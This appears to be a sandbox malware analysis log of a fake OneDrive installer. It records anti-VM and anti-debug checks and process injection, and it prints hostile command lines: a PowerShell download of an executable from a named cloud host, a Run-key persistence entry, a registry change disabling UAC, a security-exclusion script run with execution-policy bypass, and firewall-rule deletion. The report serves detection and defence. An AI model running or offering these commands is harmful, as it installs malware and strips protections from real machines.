                Source: C:\Windows\System32\svchost.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                Source: C:\Windows\System32\svchost.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                Source: C:\Windows\System32\svchost.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                Source: C:\Windows\System32\svchost.exeFile Volume queried: C:\Windows\System32 FullSizeInformationJump to behavior
                Source: C:\Users\Public\Videos\bin.exeFile Volume queried: C:\Program Files (x86) FullSizeInformationJump to behavior
                Source: C:\Users\Public\Videos\bin.exeFile Volume queried: C:\Program Files (x86) FullSizeInformationJump to behavior
                Source: C:\Users\Public\Music\20250413054815\Agghosts.exeCode function: 9_2_0066201D CloseHandle,UnmapViewOfFile,CloseHandle,CloseHandle,CloseHandle,CloseHandle,PathIsDirectoryW,PathFindFileNameW,FindFirstFileW,PathCombineW,FindNextFileW,9_2_0066201D
                Source: C:\Users\Public\Music\20250413054815\Agghosts.exeCode function: 9_2_0066201D CloseHandle,UnmapViewOfFile,CloseHandle,CloseHandle,CloseHandle,CloseHandle,PathIsDirectoryW,PathFindFileNameW,FindFirstFileW,PathCombineW,FindNextFileW,9_2_0066201D
                Source: C:\Users\Public\Music\20250413054815\Agghosts.exeCode function: 9_2_0066201D CloseHandle,UnmapViewOfFile,CloseHandle,CloseHandle,CloseHandle,CloseHandle,PathIsDirectoryW,PathFindFileNameW,FindFirstFileW,PathCombineW,FindNextFileW,9_2_0066201D
                Source: C:\Users\Public\Music\20250413054815\Agghosts.exeCode function: 9_2_0066201D CloseHandle,UnmapViewOfFile,CloseHandle,CloseHandle,CloseHandle,CloseHandle,PathIsDirectoryW,PathFindFileNameW,FindFirstFileW,PathCombineW,FindNextFileW,9_2_0066201D
                Source: C:\Users\Public\Videos\bin.exeCode function: 23_2_00405C4D GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,23_2_00405C4D
                Source: C:\Users\Public\Videos\bin.exeCode function: 23_2_0040689E FindFirstFileW,FindClose,23_2_0040689E
                Source: C:\Users\Public\Videos\bin.exeCode function: 23_2_00402930 FindFirstFileW,23_2_00402930
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                Source: C:\Program Files (x86)\letsvpn\app-3.12.2\LetsPRO.exeThread delayed: delay time: 922337203685477
                Source: C:\Program Files (x86)\letsvpn\app-3.12.2\LetsPRO.exeThread delayed: delay time: 922337203685477
                Source: C:\Program Files (x86)\letsvpn\app-3.12.2\LetsPRO.exeThread delayed: delay time: 922337203685477
                Source: C:\Program Files (x86)\letsvpn\app-3.12.2\LetsPRO.exeThread delayed: delay time: 220145
                Source: C:\Program Files (x86)\letsvpn\app-3.12.2\LetsPRO.exeThread delayed: delay time: 300000
                Source: C:\Users\user\Desktop\OneDriveSetup.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
                Source: C:\Users\user\Desktop\OneDriveSetup.exeFile opened: C:\Users\userJump to behavior
                Source: C:\Users\user\Desktop\OneDriveSetup.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Internet ExplorerJump to behavior
                Source: C:\Users\user\Desktop\OneDriveSetup.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
                Source: C:\Users\user\Desktop\OneDriveSetup.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\desktop.iniJump to behavior
                Source: C:\Users\user\Desktop\OneDriveSetup.exeFile opened: C:\Users\user\AppDataJump to behavior
                Source: svchost.exe, 00000006.00000002.3065243285.000002D040265000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: $@SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000
                Source: svchost.exe, 00000024.00000003.1851146875.000001BD4D117000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: @ethernetwlanppipvmnetextension42}
                Source: svchost.exe, 00000001.00000002.3069561799.000001B0A8E2B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWf
                Source: svchost.exe, 00000006.00000002.3063960251.000002D040213000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\scsi#disk&ven_vmware&prod_virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}
                Source: svchost.exe, 00000006.00000002.3065243285.000002D040265000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: @\??\SCSI#Disk&Ven_VMware&Prod_Virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}
                Source: OneDriveSetup.exe, 00000000.00000002.1307380542.000001F792CF6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.3072069532.000001B0AE65C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                Source: svchost.exe, 00000006.00000002.3063496536.000002D04020B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: HvHostWdiSystemHostScDeviceEnumWiaRpctrkwksAudioEndpointBuilderhidservdot3svcUmRdpServiceDsSvcfhsvcvmickvpexchangevmicshutdownvmicguestinterfacevmicvmsessionsvsvcStorSvcWwanSvcvmicvssDevQueryBrokerNgcSvcsysmainNetmanTabletInputServicePcaSvcDisplayEnhancementServiceIPxlatCfgSvcDeviceAssociationServiceNcbServiceEmbeddedModeSensorServicewlansvcCscServiceWPDBusEnumMixedRealityOpenXRSvc
                Source: OneDriveSetup.exe, 00000000.00000002.1307380542.000001F792C87000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW`L
                Source: OneDriveSetup.exe, 00000000.00000002.1304225882.0000000140000000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: #VmCi
                Source: svchost.exe, 00000006.00000002.3065243285.000002D040265000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: (@\\?\SCSI#Disk&Ven_VMware&Prod_Virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}
                Source: svchost.exe, 00000006.00000002.3065739926.000002D04029B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#Disk&Ven_VMware&Prod_Virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}
                Source: svchost.exe, 00000024.00000003.1849201484.000001BD4D138000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: @vmnetextension
                Source: Agghosts.exe, 00000018.00000002.3068680046.0000000001034000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll^
                Source: svchost.exe, 00000006.00000002.3065243285.000002D040265000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: (@\\?\scsi#disk&ven_vmware&prod_virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}
                Source: Agghosts.exe, 00000009.00000002.3068916610.0000000000E10000.00000004.00000020.00020000.00000000.sdmp, ROUTE.EXE, 00000045.00000002.2063219189.000000000351C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                Source: bin.exe, 00000017.00000003.1591734252.000000000526F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VirtualMachine
                Source: C:\Users\Public\Music\20250413054815\Agghosts.exeAPI call chain: ExitProcess graph end nodegraph_9-93583
                Source: C:\Users\Public\Videos\bin.exeAPI call chain: ExitProcess graph end node
                Source: C:\Users\user\Desktop\OneDriveSetup.exeProcess information queried: ProcessInformationJump to behavior
                Source: C:\Windows\System32\sppsvc.exeProcess queried: DebugPortJump to behavior
                Source: C:\Windows\System32\sppsvc.exeProcess queried: DebugPortJump to behavior
                Source: C:\Windows\System32\sppsvc.exeProcess queried: DebugPortJump to behavior
                Source: C:\Windows\System32\sppsvc.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\Public\Music\20250413054815\Agghosts.exeCode function: 9_2_00661F6E IsDebuggerPresent,OutputDebugStringW,9_2_00661F6E
                Source: C:\Users\Public\Music\20250413054815\Agghosts.exeCode function: 9_2_6CEFABFD OutputDebugStringA,GetLastError,9_2_6CEFABFD
                Source: C:\Users\Public\Music\20250413054815\Agghosts.exeCode function: 9_2_00666F14 GetFileVersionInfoSizeW,GetFileVersionInfoW,GetProcAddress,LoadLibraryW,GetProcAddress,FreeLibrary,GetModuleHandleW,GetModuleHandleW,GetProcAddress,GetModuleHandleW,GetProcAddress,GetCurrentProcess,VerQueryValueW,VerQueryValueW,VerQueryValueW,RegQueryValueExW,RegCloseKey,9_2_00666F14
                Source: C:\Users\Public\Music\20250413054815\Agghosts.exeCode function: 9_2_0082045C mov eax, dword ptr fs:[00000030h]9_2_0082045C
                Source: C:\Users\Public\Music\20250413054815\Agghosts.exeCode function: 9_2_006641DD mov eax, dword ptr fs:[00000030h]9_2_006641DD
                Source: C:\Users\Public\Music\20250413054815\Agghosts.exeCode function: 9_2_006651C8 mov eax, dword ptr fs:[00000030h]9_2_006651C8
                Source: C:\Users\Public\Music\20250413054815\Agghosts.exeCode function: 9_2_00666F32 mov eax, dword ptr fs:[00000030h]9_2_00666F32
                Source: C:\Users\Public\Music\20250413054815\Agghosts.exeCode function: 9_2_6D116A05 mov eax, dword ptr fs:[00000030h]9_2_6D116A05
                Source: C:\Users\Public\Music\20250413054815\Agghosts.exeCode function: 9_2_006678A6 GetProcessHeap,HeapAlloc,HeapAlloc,GetAdaptersInfo,GetProcessHeap,GetProcessHeap,HeapFree,GetProcessHeap,HeapAlloc,GetAdaptersInfo,MultiByteToWideChar,MultiByteToWideChar,StrStrIA,StrStrIA,GetProcessHeap,HeapFree,RegCloseKey,RegEnumKeyExW,RegOpenKeyExW,RegQueryValueExW,RegCloseKey,RegCloseKey,9_2_006678A6
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                Source: C:\Program Files (x86)\letsvpn\app-3.12.2\LetsPRO.exeProcess token adjusted: Debug
                Source: C:\Users\Public\Music\20250413054815\Agghosts.exeCode function: 9_2_00661901 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,9_2_00661901
                Source: C:\Users\Public\Music\20250413054815\Agghosts.exeCode function: 9_2_100085E7 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,9_2_100085E7
                Source: C:\Users\Public\Music\20250413054815\Agghosts.exeCode function: 9_2_10006875 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,9_2_10006875
                Source: C:\Users\Public\Music\20250413054815\Agghosts.exeCode function: 9_2_6D0CA214 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,9_2_6D0CA214
                Source: C:\Users\Public\Music\20250413054815\Agghosts.exeCode function: 24_2_10006875 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,24_2_10006875
                Source: C:\Users\Public\Music\20250413054815\Agghosts.exeCode function: 24_2_100085E7 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,24_2_100085E7
                Source: C:\Program Files (x86)\letsvpn\app-3.12.2\LetsPRO.exeMemory allocated: page read and write | page guard

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Yara detected Powershell download and execute
                Source: Yara matchFile source: amsi64_4496.amsi.csv, type: OTHER
                Source: Yara matchFile source: Process Memory Space: OneDriveSetup.exe PID: 7736, type: MEMORYSTR
                Source: Yara matchFile source: C:\Users\Public\Videos\download_and_run.bat, type: DROPPED
                Bypasses PowerShell execution policy
                Source: C:\Users\Public\Videos\bin.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -inputformat none -ExecutionPolicy Bypass -File "C:\Program Files (x86)\letsvpn\AddWindowsSecurityExclusion.ps1"
                Contains functionality to inject code into remote processes
                Source: C:\Users\Public\Music\20250413054815\Agghosts.exeCode function: 9_2_100057A0 _memset,_memset,_memset,GetSystemDirectoryA,GetFileAttributesA,CreateProcessA,OpenProcess,VirtualAllocEx,WriteProcessMemory,GetThreadContext,SetThreadContext,ResumeThread,9_2_100057A0
                Source: C:\Users\user\Desktop\OneDriveSetup.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Videos\download_and_run.bat" "Jump to behavior
                Source: C:\Users\user\Desktop\OneDriveSetup.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Downloads\20250413054815\1.bat" "Jump to behavior
                Source: C:\Users\user\Desktop\OneDriveSetup.exeProcess created: C:\Windows\System32\reg.exe "C:\Windows\System32\reg.exe" add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v GoogleUpdata_Service /d "C:\programdata\lnk\dick.lnk" /fJump to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001Jump to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://aa-1348336590.cos.ap-hongkong.myqcloud.com/kl.exe', 'C:\Users\Public\Videos\bin.exe')"Jump to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\Public\Videos\bin.exe "C:\Users\Public\Videos\bin.exe"Jump to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v EnableLUA /t REG_DWORD /d 0 /fJump to behavior
                Source: C:\Users\Public\Videos\bin.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -inputformat none -ExecutionPolicy Bypass -File "C:\Program Files (x86)\letsvpn\AddWindowsSecurityExclusion.ps1" Jump to behavior
                Source: C:\Users\Public\Videos\bin.exeProcess created: C:\Program Files (x86)\letsvpn\driver\tapinstall.exe "C:\Program Files (x86)\letsvpn\driver\tapinstall.exe" findall tap0901Jump to behavior
                Source: C:\Users\Public\Videos\bin.exeProcess created: C:\Program Files (x86)\letsvpn\driver\tapinstall.exe "C:\Program Files (x86)\letsvpn\driver\tapinstall.exe" install "C:\Program Files (x86)\letsvpn\driver\OemVista.inf" tap0901Jump to behavior
                Source: C:\Users\Public\Videos\bin.exeProcess created: C:\Program Files (x86)\letsvpn\driver\tapinstall.exe "C:\Program Files (x86)\letsvpn\driver\tapinstall.exe" findall tap0901Jump to behavior
                Source: C:\Users\Public\Videos\bin.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c netsh advfirewall firewall Delete rule name=letsJump to behavior
                Source: C:\Users\Public\Videos\bin.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c netsh advfirewall firewall Delete rule name=lets.exeJump to behavior
                Source: C:\Users\Public\Videos\bin.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c netsh advfirewall firewall Delete rule name=LetsPRO.exeJump to behavior
                Source: C:\Users\Public\Videos\bin.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c netsh advfirewall firewall Delete rule name=LetsPROJump to behavior
                Source: C:\Users\Public\Videos\bin.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c netsh advfirewall firewall Delete rule name=LetsVPNJump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\netsh.exe netsh advfirewall firewall Delete rule name=lets
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\netsh.exe netsh advfirewall firewall Delete rule name=lets.exe
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\netsh.exe netsh advfirewall firewall Delete rule name=LetsPRO.exe
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\netsh.exe netsh advfirewall firewall Delete rule name=LetsPRO
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\netsh.exe netsh advfirewall firewall Delete rule name=LetsVPN
                Source: C:\Program Files (x86)\letsvpn\LetsPRO.exeProcess created: C:\Program Files (x86)\letsvpn\app-3.12.2\LetsPRO.exe "C:\Program Files (x86)\letsvpn\app-3.12.2\LetsPRO.exe" checkNetFramework
                Source: C:\Program Files (x86)\letsvpn\LetsPRO.exeProcess created: C:\Program Files (x86)\letsvpn\app-3.12.2\LetsPRO.exe "C:\Program Files (x86)\letsvpn\app-3.12.2\LetsPRO.exe"
                Source: C:\Program Files (x86)\letsvpn\app-3.12.2\LetsPRO.exeProcess created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C ipconfig /all
                Source: C:\Program Files (x86)\letsvpn\app-3.12.2\LetsPRO.exeProcess created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C route print
                Source: C:\Program Files (x86)\letsvpn\app-3.12.2\LetsPRO.exeProcess created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C arp -a
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\ipconfig.exe ipconfig /all
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\ROUTE.EXE route print
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\ARP.EXE arp -a
                Source: bin.exe, 00000017.00000003.1513635861.0000000002734000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Shell_TrayWnd
                Source: bin.exe, 00000017.00000003.1653704947.0000000002822000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: AddFontResourceWAdjustWindowRectAlready ReportedAssocIsDangerousAuditSetSecurityBITMAPINFOHEADERBringWindowToTopCRYPT_OBJID_BLOBCertControlStoreCheckRadioButtonCloseEnhMetaFileCoCreateInstanceCoGetCallContextCoGetInterceptorCoMarshalHresultCoTaskMemReallocCombineTransformConnectNamedPipeContent-EncodingContent-LanguageContent-Length: CopyEnhMetaFileWCreateDIBSectionCreateDirectoryWCreateHatchBrushCreateIpNetEntryCreateJobObjectWCreateMDIWindowWCreateNamedPipeWCreatePolygonRgnCreateSemaphoreWCreateSolidBrushCreateTimerQueueCryptDestroyHashCryptExportPKCS8CryptGetKeyParamCryptMsgGetParamCryptProtectDataCryptQueryObjectCryptSetKeyParamDAD_SetDragImageDPA_EnumCallbackDdeQueryConvInfoDdeSetUserHandleDeactivateActCtxDefMDIChildProcWDefineDosDeviceWDeleteColorSpaceDeleteIpNetEntryDeleteTimerQueueDestination-PortDispatchMessageWDnsNameCompare_WDrawCaptionTempWDrawFrameControlDuplicateTokenExEndBufferedPaintEngCreatePaletteEngDeletePaletteEngDeleteSurfaceEngGetDriverNameEngStretchBltROPEngUnlockSurfaceEnumChildWindowsEnumICMProfilesWExcludeUpdateRgnExtSelectClipRgnFONTOBJ_vGetInfoFRAME_SIZE_ERRORFindFirstFreeAceFindFirstVolumeWFlushFileBuffersGC scavenge waitGC worker (idle)GODEBUG: value "GdiGetBatchLimitGdiIsMetaPrintDCGdiSetBatchLimitGetAsyncKeyStateGetBestInterfaceGetCalendarInfoWGetClassLongPtrWGetClipboardDataGetComputerNameWGetConsoleAliasWGetConsoleTitleWGetConsoleWindowGetCurrentActCtxGetCurrentObjectGetCurrentThreadGetDIBColorTableGetDesktopWindowGetDllDirectoryWGetExpandedNameWGetFileSecurityWGetFullPathNameWGetGUIThreadInfoGetGestureConfigGetGlyphIndicesWGetGlyphOutlineWGetInterfaceInfoGetIpErrorStringGetKerningPairsWGetKeyboardStateGetLastInputInfoGetLogicalDrivesGetLongPathNameWGetMenuItemCountGetMenuItemInfoWGetMenuPosFromIDGetModuleHandleWGetNamedPipeInfoGetNetworkParamsGetOpenFileNameWGetPriorityClassGetProgmanWindowGetSaveFileNameWGetScrollBarInfoGetStringScriptsGetSysColorBrushGetSystemMetricsGetTaskmanWindowGetTcpStatisticsGetTempFileNameWGetThemeFilenameGetThemePartSizeGetThemePositionGetThemeSysColorGetThreadDesktopGetUdpStatisticsGetViewportExtExGetViewportOrgExGlobalDeleteAtomHANIMATIONBUFFERHost-Remote-ListIConnectionPointICreateErrorInfoILLoadFromStreamINTERFACE_HANDLEIOleAdviseHolderIOleInPlaceFrameIP_PREFIX_ORIGINIP_SUFFIX_ORIGINIPropertyStorageIUnknown_GetSiteIUnknown_SetSiteI_CryptDetachTlsI_RpcSendReceiveIcmpParseRepliesImageList_CreateImageList_DrawExImageList_RemoveImmConfigureIMEWImmCreateContextImmGetGuideLineWImmGetOpenStatusImmGetVirtualKeyImmRegisterWordWImmSetOpenStatusImperial_AramaicInitializeFlatSBInstRuneAnyNotNLInterfaceRemovedIntlStrEqWorkerWIpReleaseAddressIsBadHugeReadPtrIsDBCSLeadByteExIsDialogMessageWIsTokenUntrustedIsValidInterfaceJasonMarshalFailK32EnumProcessesLCIDToLocaleNameLPFNVIEWCALLBACKLPPERSISTSTORAGELPPRINTPAGERANGELPSHELLFLAGSTATELPSHFILEOPSTRUCTLPWPUPOSTMESSAGELPWSANSCLASSINFOLocalLinkAddressLocaleNameToLCIDLockWindowUpdateMIB_IPADDRROW_XPMIB_IPFORWARDROWMapVirtualKeyExWMeroitic_CursiveMonitorF
                Source: C:\Users\Public\Music\20250413054815\Agghosts.exeCode function: 9_2_6D0CA417 cpuid 9_2_6D0CA417
                Source: C:\Users\Public\Music\20250413054815\Agghosts.exeCode function: ___crtGetLocaleInfoEx,GetLocaleInfoW,9_2_00662B2B
                Source: C:\Users\Public\Music\20250413054815\Agghosts.exeCode function: EnumSystemLocalesW,9_2_0082B3B7
                Source: C:\Users\Public\Music\20250413054815\Agghosts.exeCode function: GetLocaleInfoW,9_2_00662EB9
                Source: C:\Users\Public\Music\20250413054815\Agghosts.exeCode function: GetLocaleInfoW,9_2_00662EB9
                Source: C:\Users\Public\Music\20250413054815\Agghosts.exeCode function: GetModuleHandleW,GetProcAddress,EncodePointer,DecodePointer,GetLocaleInfoEx,GetLocaleInfoW,9_2_6CF10FC1
                Source: C:\Users\user\Desktop\OneDriveSetup.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformationJump to behavior
                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Windows\System32\svchost.exeQueries volume information: C: VolumeInformationJump to behavior
                Source: C:\Windows\System32\svchost.exeQueries volume information: C: VolumeInformationJump to behavior
                Source: C:\Windows\System32\svchost.exeQueries volume information: C: VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Users\Public\Videos\bin.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Users\Public\Videos\bin.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
